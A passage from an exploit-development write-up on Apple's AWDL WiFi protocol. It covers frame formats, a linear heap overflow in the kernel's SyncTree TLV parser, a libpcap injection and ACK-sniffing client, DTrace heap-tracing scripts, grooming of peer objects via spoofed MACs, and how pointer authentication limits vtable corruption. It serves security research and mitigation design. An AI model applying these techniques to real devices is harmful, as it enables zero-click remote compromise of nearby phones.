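    return 2484;                 /* the Japan-only 2.4 GHz channel */
  return 5000 + 5 * channel;     /* channel 44 -> 5220 MHz (5.220 GHz) */
}

int main(void) {
  printf("channel 6:  %d MHz\n", channel_center_mhz(6));
  printf("channel 44: %d MHz\n", channel_center_mhz(44));
  return 0;
}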


AWDL typically sends and receives frames on channels 6 and 44. How does that work if you're also using your home WiFi network on a different channel?

Channel Hopping and Time Division Multiplexing

In order to appear to be connected to two separate networks on separate frequencies at the same time, AWDL-capable devices split time into 16ms chunks and tell the WiFi controller chip to quickly switch between the channel for the infrastructure network and the channel being used by AWDL:



A typical AWDL channel hopping sequence, alternating between small periods on AWDL social channels and longer periods on the AP channel


The actual channel sequence is dynamic. Peers broadcast their channel sequences and adapt their own sequence to match peers with which they wish to communicate. The periods when an AWDL peer is listening on an AWDL channel are known as Availability Windows.


In this way the device can appear to be connected to the access point whilst also participating in the AWDL mesh at the same time. Of course, frames might be missed from both the AP and the AWDL mesh but the protocols are treating radio as an unreliable transport anyway so this only really has an impact on throughput. A large part of the AWDL protocol involves trying to synchronize the channel switching between peers to improve throughput.


The SEEMOO labs paper has a much more detailed look at the AWDL channel hopping mechanism.

AWDL frames

These are the first software-controlled fields which go over the air in a WiFi frame:


struct ieee80211_hdr {

  uint16_t frame_control;

  uint16_t duration_id;

  struct ether_addr dst_addr;

  struct ether_addr src_addr;

  struct ether_addr bssid_addr;

  uint16_t seq_ctrl;

} __attribute__((packed));


The first word contains fields which define the type of this frame. These are broadly split into three frame families: Management, Control and Data. The building blocks of AWDL use a subtype of Management frames called Action frames.


The address fields in an 802.11 header can have different meanings depending on the context; for our purposes the first is the destination device MAC address, the second is the source device MAC and the third is the MAC address of the infrastructure network access point or BSSID.


Since AWDL is a peer-to-peer network and doesn't use an access point, the BSSID field of an AWDL frame is set to the hard-coded AWDL BSSID MAC of 00:25:00:ff:94:73. It's this BSSID which AWDL clients are looking for when they're trying to find other peers. Your router won't accidentally use this BSSID because Apple owns the 00:25:00 OUI.


The format of the bytes following the header depends on the frame type. For an Action frame the next byte is a category field. There are a large number of categories which allow devices to exchange all kinds of information. For example category 5 covers various types of radio measurements like noise histograms.


The special category value 0x7f defines this frame as a vendor-specific action frame meaning that the next three bytes are the OUI of the vendor responsible for this custom action frame format.


Apple owns the OUI 0x00 0x17 0xf2 and this is the OUI used for AWDL action frames. Every byte in the frame after this is now proprietary, defined by Apple rather than an IEEE standard.
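
Putting those pieces together, a sniffer can recognize an AWDL action frame with a few byte comparisons. This is my own illustrative check following the layout described above, not Apple's or the SEEMOO dissector's code:

#include <stdbool.h>
#include <stdint.h>
#include <string.h>

static const uint8_t awdl_bssid[6] = {0x00, 0x25, 0x00, 0xff, 0x94, 0x73};
static const uint8_t apple_oui[3]  = {0x00, 0x17, 0xf2};

/* frame points at the start of the 802.11 header (radiotap already stripped).
   A fuller check would also verify the frame_control type/subtype bits. */
bool looks_like_awdl_action_frame(const uint8_t *frame, size_t len) {
  if (len < 28)                                /* 24-byte header + category + OUI */
    return false;
  if (memcmp(frame + 16, awdl_bssid, 6) != 0)  /* third address field: BSSID */
    return false;
  if (frame[24] != 0x7f)                       /* vendor-specific action category */
    return false;
  return memcmp(frame + 25, apple_oui, 3) == 0;
}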


The SEEMOO labs team have done a great job reversing the AWDL action frame format and they developed a wireshark dissector.


AWDL Action frames have a fixed-sized header followed by a variable length collection of TLVs:



The layout of fields in an AWDL frame: 802.11 header, action frame header, AWDL fixed header and variable length AWDL payload


Each TLV has a single-byte type followed by a two-byte length which is the length of the variable-sized payload in bytes.


There are two types of AWDL action frame: Master Indication Frames (MIF) and Periodic Synchronization Frames (PSF). They differ only in their type field and the collection of TLVs they contain.


An AWDL mesh network has a single master node decided by an election process. Each node broadcasts a MIF containing a master metric parameter; the node with the highest metric becomes the master node. It is this master node's PSF timing values which should be adopted as the true timing values for all the other nodes to synchronize to; in this way their availability windows can overlap and the network can have a higher throughput.

Frame processing

Back in 2017, Project Zero researcher Gal Beniamini published a seminal 5-part blog post series entitled Over The Air where he exploited a vulnerability in the Broadcom WiFi chipset to gain native code execution on the WiFi controller, then pivoted via an iOS kernel bug in the chipset-to-Application Processor interface to achieve arbitrary kernel memory read/write.


In that case, Gal targeted a vulnerability in the Broadcom firmware when it was parsing data structures related to TDLS. The raw form of these data structures was handled by the chipset firmware itself and never made it to the application processor.


In contrast, for AWDL the frames appear to be parsed in their entirety on the Application Processor by the kernel driver. Whilst this means we can explore a lot of the AWDL code, it also means that we're going to have to build the entire exploit on top of primitives we can build with the AWDL parser, and those primitives will have to be powerful enough to remotely compromise the device. Apple continues to ship new mitigations with each iOS release and hardware revision, and we're of course going to target the latest iPhone 11 Pro with the largest collection of these mitigations in place.


Can we really build something powerful enough to remotely defeat kernel pointer authentication just with a linear heap overflow in a WiFi frame parser? Defeating mitigations usually involves building up a library of tricks to help build more and more powerful primitives. You might start with a linear heap overflow and use it to build an arbitrary read, then use that to help build an arbitrary bit flip primitive and so on.


I've built a library of tricks and techniques like this for doing local privilege escalations on iOS but I'll have to start again from scratch for this brand new attack surface.

A brief tour of the AWDL codebase

The first two C++ classes to familiarize ourselves with are IO80211AWDLPeer and IO80211AWDLPeerManager. There's one IO80211AWDLPeer object for each AWDL peer which a device has recently received a frame from. A background timer destroys inactive IO80211AWDLPeer objects. There's a single instance of the IO80211AWDLPeerManager which is responsible for orchestrating interactions between this device and other peers.


Note that although we have some function names from the iOS 12 beta 1 kernelcache and the MacOS IO80211Family driver we don't have object layout information. Brandon Azad pointed out that the MacOS prelinked kernel image does contain some structure layout information in the __CTF.__ctf section which can be parsed by the dtrace ctfdump tool. Unfortunately this seems to only contain structures from the open source XNU code.


The sizes of OSObject-based IOKit objects can easily be determined statically but the names and types of individual fields cannot. One of the most time-consuming tasks of this whole project was the painstaking process of reverse engineering the types and meanings of a huge number of the fields in these objects. Each IO80211AWDLPeer object is almost 6KB; that's a lot of potential fields. Having structure layout information would probably have saved months.


If you're a defender building a threat model don't interpret this the wrong way: I would assume any competent real-world exploit development team has this information; either from images or devices with full debug symbols they have acquired with or without Apple's consent, insider access, or even just from monitoring every single firmware image ever publicly released to check whether debug symbols were released by accident. Larger groups could even have people dedicated to building custom reversing tools.


Six years ago I had hoped Project Zero would be able to get legitimate access to data sources like this. Six years later and I am still spending months reversing structure layouts and naming variables.


We'll take IO80211AWDLPeerManager::actionFrameInput as the point where untrusted raw AWDL frame data starts being parsed. There is actually a separate, earlier processing layer in the WiFi chipset driver but its parsing is minimal.


Each frame received while the device is listening on a social channel which was sent to the AWDL BSSID ends up at actionFrameInput, wrapped in an mbuf structure. Mbufs are an anachronistic data structure used for wrapping collections of networking buffers. The mbuf API is the stuff of nightmares, but that's not in scope for this blogpost.


The mbuf buffers are concatenated to get a contiguous frame in memory for parsing, then IO80211PeerManager::findPeer is called, passing the source MAC address from the received frame:


IO80211AWDLPeer*

IO80211PeerManager::findPeer(struct ether_addr *peer_mac)


If an AWDL frame has recently been received from this source MAC then this function returns a pointer to an existing IO80211AWDLPeer structure representing the peer with that MAC. The IO80211AWDLPeerManager uses a fairly complicated priority queue data structure called IO80211CommandQueue to store pointers to these currently active peers.


If the peer isn't found in the IO80211AWDLPeerManager's queue of peers then a new IO80211AWDLPeer object is allocated to represent this new peer and it's inserted into the IO80211AWDLPeerManager's peers queue.


Once a suitable peer object has been found the IO80211AWDLPeerManager then calls the actionFrameReport method on the IO80211AWDLPeer so that it can handle the action frame.


This method is responsible for most of the AWDL action frame handling and contains most of the untrusted parsing. It first updates some timestamps then reads various fields from TLVs in the frame using the IO80211AWDLPeerManager::getTlvPtrForType method to extract them directly from the mbuf. After this initial parsing comes the main loop which takes each TLV in turn and parses it.


First each TLV is passed to IO80211AWDLPeer::tlvCheckBounds. This method has a hardcoded list of specific minimum and maximum TLV lengths for some of the supported TLV types. For types not explicitly listed it enforces a maximum length of 1024 bytes. I mentioned earlier that I often encounter code constructs which look like shallow memory corruption only to later discover a bounds check far away. This is exactly that kind of construct, and is in fact where Apple added a bounds check in the patch.


Type 0x14 (which has the vulnerability in the parser) isn't explicitly listed in tlvCheckBounds so it gets the default upper length limit of 1024, significantly larger than the 60 byte buffer allocated for the destination buffer in the IO80211AWDLPeer structure.


This pattern of separating bounds checks away from parsing code is fragile; it's too easy to forget or not realize that when adding code for a new TLV type it's also a requirement to update the tlvCheckBounds function. If this pattern is used, try to come up with a way to enforce that new code must explicitly declare an upper bound here. One option could be to ensure an enum is used for the type and wrap the tlvCheckBounds method in a pragma to temporarily enable clang's -Wswitch-enum warning as an error:


#pragma clang diagnostic push

#pragma clang diagnostic error "-Wswitch-enum"

 

IO80211AWDLPeer::tlvCheckBounds(...) {

  switch(tlv->type) {

    case type_a:

      ...;

    case type_b:

      ...;

  }
}

 

#pragma clang diagnostic pop


This causes a compilation error if the switch statement doesn't have an explicit case statement for every value of the tlv->type enum.


Static analysis tools like Semmle can also help here. The EnumSwitch class can be used like in this example code to check whether all enum values are explicitly handled.


If the tlvCheckBounds checks pass then there is a switch statement with a case to parse each supported TLV:


Type    Handler
0x02    IO80211AWDLPeer::processServiceResponseTLV
0x04    IO80211AWDLPeer::parseAwdlSyncParamsTlvAndTakeAction
0x05    IO80211AWDLPeer::parseAwdlElectionParamsV1
0x06    inline parsing of serviceParam
0x07    IO80211Peer::parseHTCapTLV
0x0c    nop
0x10    inline parsing of ARPA
0x11    IO80211Peer::parseVhtCapTLV
0x12    IO80211AWDLPeer::parseAwdlChanSeqFromChanSeqTLV
0x14    IO80211AWDLPeer::parseAwdlSyncTreeTLV
0x15    inline parser extracting 2 bytes
0x16    IO80211AWDLPeer::parseBloomFilterTlv
0x17    inlined parser of NSync
0x1d    IO80211AWDLPeer::parseBssSteeringTlv

SyncTree vulnerability in context

Here's a cleaned up decompilation of the relevant portions of the parseAwdlSyncTreeTLV method which contains the vulnerability:


int

IO80211AWDLPeer::parseAwdlSyncTreeTLV(awdl_tlv* tlv)

{

  u64 new_sync_tree_size;

 

  u32 old_sync_tree_size = this->n_sync_tree_macs + 1;

  if (old_sync_tree_size >= 10 ) {

    old_sync_tree_size = 10;

  }

 

  if (old_sync_tree_size == tlv->len/6 ) {

    new_sync_tree_size = old_sync_tree_size;

  } else {

    new_sync_tree_size = tlv->len/6;

    this->n_sync_tree_macs = new_sync_tree_size;

  }

 

  memcpy(this->sync_tree_macs, &tlv->val[0], 6 * new_sync_tree_size);

 

...


sync_tree_macs is a 60-byte inline array in the IO80211AWDLPeer structure, at offset +0x1648. That's enough space to store 10 MAC addresses. The IO80211AWDLPeer object is 0x16a8 bytes in size which means it will be allocated in the kalloc.6144 zone.
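
Those numbers already give a feel for the reach of the copy. A quick back-of-the-envelope calculation, using the offsets above plus the 1024-byte default limit from tlvCheckBounds (a sketch for illustration, not code from the exploit):

#include <stdio.h>

int main(void) {
  unsigned buf_offset  = 0x1648; /* offset of sync_tree_macs in the peer object */
  unsigned buf_size    = 60;     /* room for 10 MAC addresses */
  unsigned peer_size   = 0x16a8; /* size of an IO80211AWDLPeer object */
  unsigned zone_chunk  = 6144;   /* kalloc.6144 chunk backing the object */
  unsigned max_tlv_len = 1024;   /* default tlvCheckBounds limit for type 0x14 */

  unsigned copy_len = (max_tlv_len / 6) * 6;  /* rounded down: 1020 bytes */

  printf("bytes copied:          %u\n", copy_len);
  printf("bytes past the buffer: %u\n", copy_len - buf_size);
  printf("bytes past the object: %u\n", buf_offset + copy_len - peer_size);
  printf("bytes past the chunk:  %u\n", buf_offset + copy_len - zone_chunk);
  return 0;
}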


tlvCheckBounds will enforce a maximum value of 1024 for the length of the SyncTree TLV. The TLV parser will round that value down to the nearest multiple of 6 and copy that number of bytes into the sync_tree_macs array at +0x1648. This will be our memory corruption primitive: a linear heap buffer overflow in 6-byte chunks which can corrupt all the fields in the IO80211AWDLPeer object past the end of the buffer at +0x1684 and then a few hundred bytes off of the end of the kalloc.6144 zone chunk. We can easily cause IO80211AWDLPeer objects to be allocated next to each other by sending AWDL frames from a large number of different spoofed source MAC addresses in quick succession. This gives us four rough primitives to think about as we start to find a path to exploitation:


1) Corrupting fields after the sync_tree_macs array in the IO80211AWDLPeer object:

Overflowing into the fields at the end of the peer object


2) Corrupting the lower fields of an IO80211AWDLPeer object groomed next to this one:


Overflowing into the fields at the start of a peer object next to this one


3) Corrupting the lower bytes of another object type we can groom to follow a peer in kalloc.6144:


Overflowing into a different type of object next to this peer in the same zone


4) Meta-grooming the zone allocator to place a peer object at a zone boundary so we can corrupt the early bytes of an object from another zone:



Overflowing into a different type of object in a different zone


We'll revisit these options in greater detail soon.

Getting on the air

At this point we understand enough about the AWDL frame format to start trying to get controlled, arbitrary data going over the air and reach the frame parsing entrypoint.


I tried for a long time to get the open source academic OWL project to build and run successfully, sadly without success. In order to start making progress I decided to write my own AWDL client from scratch. Another approach could have been to write a MacOS kernel module to interact with the existing AWDL driver, which may have simplified some aspects of the exploit but also made others much harder.


I started off using an old Netgear WG111v2 WiFi adapter I've had for many years which I knew could do monitor mode and frame injection, albeit only on 2.4 GHz channels. It uses an rtl8187 chipset. Since I wanted to use the Linux drivers for these adapters I bought a Raspberry Pi 4B to run the exploit.


In the past I've used Scapy for crafting network packets from scratch. Scapy can craft and inject arbitrary 802.11 frames, but since we're going to need a lot of control over injection timing it might not be the best tool. Scapy uses libpcap to interact with the hardware to inject raw frames so I took a look at libpcap. Some googling later I found this excellent tutorial example which demonstrates exactly how to use libpcap to inject a raw 802.11 frame. Let's dissect exactly what's required:

Radiotap

We've seen the structure of the data in 802.11 AWDL frames; there will be an ieee80211 header at the start, an Apple OUI, then the AWDL action frame header and so on. If our WiFi adaptor were connected to a WiFi network, this might be enough information to transmit such a frame. The problem is that we're not connected to any network. This means we need to attach some metadata to our frame to tell the WiFi adaptor exactly how it should get this frame on to the air. For example, what channel and with what bandwidth and modulation scheme should it use to inject the frame? Should it attempt re-transmits until an ACK is received? What signal strength should it use to inject the frame?


Radiotap is a standard for expressing exactly this type of frame metadata, both when injecting frames and receiving them. It's a slightly fiddly variable-sized header which you can prepend on the front of a frame to be injected (or read off the start of a frame which you've sniffed.)


Whether the radiotap fields you specify are actually respected and used depends on the driver you are using - a driver may choose to simply not allow userspace to specify many aspects of injected frames. Here's an example radiotap header captured from an AWDL frame using the built-in MacOS packet sniffer on a MacBook Pro. Wireshark has parsed the binary radiotap format for us:



Wireshark parses radiotap headers in pcaps and shows them in a human-readable form


From this radiotap header we can see a timestamp, the data rate used for transmission, the channel (5.220 GHz which is channel 44) and the modulation scheme (OFDM). We can also see an indication of the strength of the received signal and a measure of the noise.


The tutorial gave the following radiotap header:


static uint8_t u8aRadiotapHeader[] = {

  0x00, 0x00, // version

  0x18, 0x00, // size

  0x0f, 0x80, 0x00, 0x00, // included fields

  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //timestamp

  0x10, // add FCS

  0x00,// rate

  0x00, 0x00, 0x00, 0x00, // channel

  0x08, 0x00, // NOACK; don't retry

};


With knowledge of radiotap and a basic header it's not too tricky to get an AWDL frame on to the air using the pcap_inject interface and a wireless adaptor in monitor mode:


int pcap_inject(pcap_t *p, const void *buf, size_t size)
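
As a rough sketch of how the pieces fit together (a hypothetical helper with simplified error handling; the radiotap bytes would be the header shown above):

#include <pcap/pcap.h>
#include <stdint.h>
#include <string.h>

/* Prepend a radiotap header to an 802.11 frame and inject it on a
   monitor-mode interface. Illustrative only. */
int inject_80211_frame(const char *ifname,
                       const uint8_t *radiotap, size_t radiotap_len,
                       const uint8_t *frame, size_t frame_len) {
  char errbuf[PCAP_ERRBUF_SIZE];
  pcap_t *p = pcap_open_live(ifname, 65535, 1, 1, errbuf);
  if (!p)
    return -1;

  uint8_t buf[4096];
  if (radiotap_len + frame_len > sizeof(buf)) {
    pcap_close(p);
    return -1;
  }
  memcpy(buf, radiotap, radiotap_len);
  memcpy(buf + radiotap_len, frame, frame_len);

  int ret = pcap_inject(p, buf, radiotap_len + frame_len);
  pcap_close(p);
  return ret; /* bytes written, or -1 on error */
}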


Of course, this doesn't immediately work and with some trial and error it seems that the rate and channel fields aren't being respected. Injection with this adaptor seems to only work at 1Mbps, and the channel specified in the radiotap header won't be the one used for injection. This isn't such a problem as we can still easily set the wifi adaptor channel manually:


iw dev wlan0 set channel 6


Injection at 1Mbps is exceptionally slow but this is enough to get a test AWDL frame on to the air and we can see it in Wireshark on another device in monitor mode. But nothing seems to be happening on a target device. Time for some debugging!

Debugging with DTrace

The SEEMOO labs paper had already suggested setting some MacOS boot arguments to enable more verbose logging from the AWDL kernel driver. These log messages were incredibly helpful but often you want more information than you can get from the logs.


For the initial report PoC I showed how to use the MacOS kernel debugger to modify an AWDL frame which was about to be transmitted. Typically, in my experience, the MacOS kernel debugger is exceptionally unwieldy and unreliable. Whilst you can technically script it using lldb's python bindings, I wouldn't recommend it.


Apple does have one trick up its sleeve, however: DTrace! Where the MacOS kernel debugger is awful in my opinion, DTrace is exceptional. DTrace is a dynamic tracing framework originally developed by Sun Microsystems for Solaris. It's been ported to many platforms including MacOS and ships by default. It's the magic behind tools such as Instruments. DTrace allows you to hook in little snippets of tracing code almost wherever you want, both in userspace programs and, amazingly, in the kernel. DTrace has its quirks. Hooks are written in the D language, which doesn't have loops, and the scoping of variables takes a little while to get your head around, but it's the ultimate debugging and reversing tool.


For example, I used this DTrace script on MacOS to log whenever a new IO80211AWDLPeer object was allocated, printing its heap address and MAC address:


self char* mac;

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:entry {

  self->mac = (char*)arg0;

}

 

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:return {

  printf("new AWDL peer: %02x:%02x:%02x:%02x:%02x:%02x allocation:%p", self->mac[0], self->mac[1], self->mac[2], self->mac[3], self->mac[4], self->mac[5], arg1); 

}


Here we're creating two hooks, one which runs at a function entry point and the other which runs just before that same function returns. We can use the self-> syntax to pass variables between the entry point and return point and DTrace makes sure that the entries and returns match up properly.


We have to use the mangled C++ symbol in dtrace scripts; using c++filt we can see the demangled version:


$ c++filt -n _ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager

IO80211AWDLPeer::withAddressAndManager(unsigned char const*, IO80211AWDLPeerManager*)


The entry hook "saves" the pointer to the MAC address which is passed as the first argument; associating it with the current thread and stack frame. The return hook then prints out that MAC address along with the return value of the function (arg1 in a return hook is the function's return value) which in this case is the address of the newly-allocated IO80211AWDLPeer object.


With DTrace you can easily prototype custom heap logging tools. For example if you're targeting a particular allocation size and wish to know what other objects are ending up in there you could use something like the following DTrace script:


/* some globals with values */

BEGIN {

  target_size_min = 97;

  target_size_max = 128;

}

 

fbt:mach_kernel:kalloc_canblock:entry {

  self->size = *(uint64_t*)arg0;

}

 

fbt:mach_kernel:kalloc_canblock:return

/self->size >= target_size_min &&

 self->size <= target_size_max   /

{

  printf("target allocation %x =  %x", self->size, arg1);

  stack();

}


The expression between the two /'s allows the hook to be conditionally executed. In this case limiting it to cases where kalloc_canblock has been called with a size between target_size_min and target_size_max. The built-in stack() function will print a stack trace, giving you some insight into the allocations within a particular size range. You could also use ustack() to continue that stack trace in userspace if this kernel allocation happened due to a syscall for example.


DTrace can also safely dereference invalid addresses without kernel panicking, making it very useful for prototyping and debugging heap grooms. With some ingenuity it's also possible to do things like dump linked-lists and monitor for the destruction of particular objects.


I'd really recommend spending some time learning DTrace; once you get your head around its esoteric programming model you'll find it an immensely powerful tool.

Reaching the entrypoint

Using DTrace to log stack frames I was able to trace the path legitimate AWDL frames took through the code and determine how far my fake AWDL frames made it. Through this process I discovered that there are, at least on MacOS, two AWDL parsers in the kernel: the main one we've already seen inside the IO80211Family kext and a second, much simpler one in the driver for the particular chipset being used. There were three checks in this simpler parser which I was failing, each of which meant my fake AWDL frames never made it to the IO80211Family code:


Firstly, the source MAC address was being validated. MAC addresses actually contain multiple fields: 

The first half of a MAC address is an OUI. The least significant bit of the first byte defines whether the address is multicast or unicast. The second bit defines whether the address is locally administered or globally unique. 


Diagram used under CC BY-SA 2.5 By Inductiveload, modified/corrected by Kju - SVG drawing based on PNG uploaded by User:Vtraveller. This can be found on Wikipedia here


The source MAC address 01:23:45:67:89:ab from the libpcap example was an unfortunate choice as it has the multicast bit set. AWDL only wants to deal with unicast addresses and rejects frames from multicast addresses. Choosing a new MAC address to spoof without that bit set solved this problem.
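
The two flag bits live in the lowest bits of the first byte of the address, so the checks are one-liners (a sketch, not the driver's actual code):

#include <stdbool.h>
#include <stdint.h>

/* 01:23:45:67:89:ab -> first byte 0x01, so the multicast bit is set. */
static bool mac_is_multicast(const uint8_t mac[6]) {
  return (mac[0] & 0x01) != 0;  /* least significant bit of the first byte */
}

static bool mac_is_locally_administered(const uint8_t mac[6]) {
  return (mac[0] & 0x02) != 0;  /* second least significant bit */
}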


The next check was that the first two TLVs in the variable-length payload section of the frame must be a type 4 (sync parameters) then a type 6 (service parameters.)


Finally the channel number in the sync parameters had to match the channel on which the frame had actually been received.


With those three issues fixed I was finally able to get arbitrary controlled bytes to appear at the actionFrameReport method on a remote device and the next stage of the project could begin.

A framework for an AWDL client

We've seen that AWDL uses time division multiplexing to quickly switch between the channels used for AWDL (typically 6 and 44) and the channel used by the access point the device is connected to. By parsing the AWDL synchronization parameters TLV in the PSF and MIF frames sent by AWDL peers you can calculate when they will be listening in the future. The OWL project uses the linux libev library to try to only transmit at the right moment when other peers will be listening.


There are a few problems with this approach for our purposes:


Firstly, and very importantly, this makes targeting difficult. AWDL action frames are (usually) sent to a broadcast destination MAC address (ff:ff:ff:ff:ff:ff.) It's a mesh network and these frames are meant to be used by all the peers for building up the mesh.


Whilst exploiting every listening AWDL device in proximity at the same time would be an interesting research problem and make for a cool demo video, it also presents many challenges far outside the initial scope. I really needed a way to ensure that only devices I controlled would process the AWDL frames I sent.


With some experimentation it turned out that all AWDL frames can also be sent to unicast addresses and devices would still parse them. This presents another challenge as the AWDL virtual interface's MAC address is randomly generated each time the interface is activated. For testing on MacOS it suffices to run:


ifconfig awdl0


to determine the current MAC address. For iOS it's a little more involved; my chosen technique has been to sniff on the AWDL social channels and correlate signal strength with movements of the device to determine its current AWDL MAC.


There's one other important difference when you send an AWDL action frame to a unicast address: if the device is currently listening on that channel and receives the frame, it will send an ACK. This turns out to be extremely helpful. We will end up building some quite complex primitives using AWDL action frames, abusing the protocol to build a weird machine. Being able to tell whether a target device really received a frame or not means we can treat AWDL frames more like a reliable transport medium. For the typical usage of AWDL this isn't necessary; but our usage of AWDL is not going to be typical.


This ACK-sniffing model will be the building block for our AWDL frame injection API.

Acktually receiving ACKs

Just because the ACKs are coming over the air now doesn't mean we actually see them. Although the WiFi adaptor we're using for injection must be technically capable of receiving ACKs (as they are a fundamental protocol building block), being able to see them on the monitor interface isn't guaranteed.


A screenshot of wireshark showing a spoofed AWDL frame followed by an Acknowledgement from the target device.


The libpcap interface is quite generic and doesn't have any way to indicate that a frame was ACKed or not. It might not even be the case that the kernel driver is aware whether an ACK was received. I didn't really want to delve into the injection interface kernel drivers or firmware as that was liable to be a major investment in itself so I tried some other ideas.


ACK frames in 802.11g and 802.11a are timing based. There's a short window after each transmitted frame when the receiver can ACK if they received the frame. It's for this reason that ACK frames don't contain a source MAC address. It's not necessary as the ACK is already perfectly correlated with a source device due to the timing.


If we also listen on our injection interface in monitor mode we might be able to receive the ACK frames ourself and correlate them. As mentioned, not all chipsets and drivers actually give you all the management frames.

 

For my early prototypes, I managed to find a pair in my box of WiFi adaptors where one would successfully inject on 2.4 GHz channels at 1Mbps and the other would successfully sniff ACKs on that channel at 1Mbps.


1Mbps is exceptionally slow; a relatively large AWDL frame ends up being on the air for 10ms or more at that speed, so if your availability window is only a few ms you're not going to get many frames per second. Still, this was enough to get going.


The injection framework I built for the exploit uses two threads, one for frame injection and one for ACK sniffing. Frames are injected using the try_inject function, which extracts the spoofed source MAC address and signals to the second sniffing thread to start looking for an ACK frame being sent to that MAC.


Using a pthread condition variable, the injecting thread can then wait for a limited amount of time during which the sniffing thread may or may not see the ACK. If the sniffing thread does see the ACK it can record this fact then signal the condition variable. The injection thread will stop waiting and can check whether the ACK was received.


Take a look at try_inject_internal in the exploit for the mutex and condition variable setup code for this.
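
In outline, the handshake between the two threads looks something like the following; this is a simplified sketch with made-up names (ack_seen, wait_for_ack), not the exploit's actual code:

#include <pthread.h>
#include <stdbool.h>
#include <time.h>

static pthread_mutex_t ack_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t  ack_cond = PTHREAD_COND_INITIALIZER;
static bool ack_seen = false;

/* Called by the sniffing thread when it sees an ACK sent to our spoofed MAC. */
void note_ack_received(void) {
  pthread_mutex_lock(&ack_lock);
  ack_seen = true;
  pthread_cond_signal(&ack_cond);
  pthread_mutex_unlock(&ack_lock);
}

/* Called by the injecting thread after transmitting; returns true if the
   frame was ACKed within timeout_ms milliseconds. */
bool wait_for_ack(long timeout_ms) {
  struct timespec deadline;
  clock_gettime(CLOCK_REALTIME, &deadline);
  deadline.tv_sec  += timeout_ms / 1000;
  deadline.tv_nsec += (timeout_ms % 1000) * 1000000L;
  if (deadline.tv_nsec >= 1000000000L) {
    deadline.tv_sec  += 1;
    deadline.tv_nsec -= 1000000000L;
  }

  pthread_mutex_lock(&ack_lock);
  while (!ack_seen) {
    if (pthread_cond_timedwait(&ack_cond, &ack_lock, &deadline) != 0)
      break;  /* timed out */
  }
  bool got_ack = ack_seen;
  ack_seen = false;  /* reset for the next injection attempt */
  pthread_mutex_unlock(&ack_lock);
  return got_ack;
}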


There's a wrapper around try_inject called inject which repeatedly calls try_inject until it succeeds. These two methods allow us to do all the timing sensitive and insensitive frame injection we need.


These two methods take a variable number of pkt_buf_t pointers; a simple custom variable-sized buffer wrapper object. The advantage of this approach is that it allows us to quickly prototype new AWDL frame structures without having to write boilerplate code. For example, this is all the code required to inject a basic AWDL frame and re-transmit it until the target receives it:


inject(RT(),

       WIFI(dst, src),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       PKT_END());


Investing a little bit of time building this API saved a lot of time in the long run and made it very easy to experiment with new ideas.


With an injection framework finally up and running we can start to think about how to actually exploit this vulnerability!

The new challenges on A12/A13

The Apple A12 SoC found in the iPhone XS/XR contained the first commercially-available ARM CPU implementing the optional ARMv8.3 Pointer Authentication feature. This was released in September 2018. This post from Project Zero researcher Brandon Azad covers PAC and its implementation by Apple in great detail, as does this presentation from the 2019 LLVM developers meeting.


Its primary use is as a form of Control Flow Integrity. In theory all function pointers present in memory should contain a Pointer Authentication Code in their upper bits which will be verified after the pointer is loaded from memory but before it's used to modify control flow.


In almost all cases this PAC instrumentation will be added by the compiler. There's a really great document from the clang team which goes into great detail about the implementation of PAC from a compiler point of view and the security tradeoffs involved. It has a brilliant section on the threat model of PAC which frankly and honestly discusses the cases where PAC may help and the cases where it won't. Documentation like this should ship with every mitigation.


Having a publicly documented threat model helps everyone understand the intentions behind design decisions and the tradeoffs which were necessary. It helps build a common vocabulary and helps to move discussions about mitigations away from a focus on security through obscurity towards a qualitative appraisal of their strengths and weaknesses.


Concretely, the first hurdle PAC will throw up is that it will make it harder to forge vtable pointers.


All OSObject-derived objects have virtual methods. IO80211AWDLPeer, like almost all IOKit C++ classes derives from OSObject so the first field is a vtable pointer. As we saw in the heap-grooming sketches earlier, by spraying IO80211AWDLPeer objects then triggering the heap overflow we can easily gain control of a vtable pointer. This technique was used in Mateusz Jurczyk's Samsung MMS remote exploit and Natalie Silvanovich's remote WebRTC exploit this year.


Kernel virtual calls have gone from looking like this on A11 and below:


LDR   X8, [X20]      ; load vtable pointer

LDR   X8, [X8,#0x38] ; load function pointer from vtable

MOV   X0, X20

BLR   X8             ; call virtual function


to this on A12 and above:


LDR   X8, [X20]           ; load vtable pointer

 

; authenticate vtable pointer using A-family data key and zero context

; if authentication passes, add 0x38 to vtable pointer, load value

; at that address into X9 and store X8+0x38 back to X8 without a PAC

LDRAA X9, [X8,#0x38]!

 

; overwrite the upper 16 bits of X8 with the constant 0xFFFC

; this is a hash of the mangled symbol; constant at each callsite

MOVK  X8, #0xFFFC,LSL#48

MOV   X0, X20

 

; authenticate virtual function pointer with A-family instruction key

; and context value where the upper 16 bits are a hash of the

; virtual function prototype and the lower 48 bits are the runtime

; address of the virtual function pointer in the vtable

BLRAA X9, X8


Diagrammatic view of a C++ virtual call in ARM64e showing the keys and discriminators used


What does that mean in practice?


If we don't have a signing gadget, then we can't trivially point a vtable pointer to an arbitrary address. Even if we could, we'd need a data and instruction family signing gadget with control over the discriminator.


We can swap a vtable pointer with any other A-family 0-context data key signed pointer, however the virtual function pointer itself is signed with a context value consisting of the address of the vtable entry and a hash of the virtual function prototype. This means we can't swap virtual function pointers from one vtable into another one (or more likely into a fake vtable to which we're able to get an A-family data key signed pointer.)


We can swap one vtable pointer for another one to cause a type confusion, however every virtual function call made through that vtable pointer would have to be calling a function with a matching prototype hash. This isn't so improbable; a fundamental building block of object-oriented programming in C++ is to call functions with matching prototypes but different behaviour via a vtable. Nevertheless you'd have to do some thinking to come up with a generic defeat using this approach.


An important observation is that the vtable pointers themselves have no address diversity; they're signed with a zero-context. This means that if we can disclose a signed vtable pointer for an object of type A at address X, we can overwrite the vtable pointer for another object of type A at a different address Y.


This might seem completely trivial and uninteresting but remember: we only have a linear heap buffer overflow. If the vtable pointer had address diversity then for us to be able to safely corrupt fields after the vtable in an adjacent object we'd have to first disclose the exact vtable pointer following the object which we can overflow out of. Instead we can disclose any vtable pointer for this type and it will be valid.


The clang design doc explains why this is:


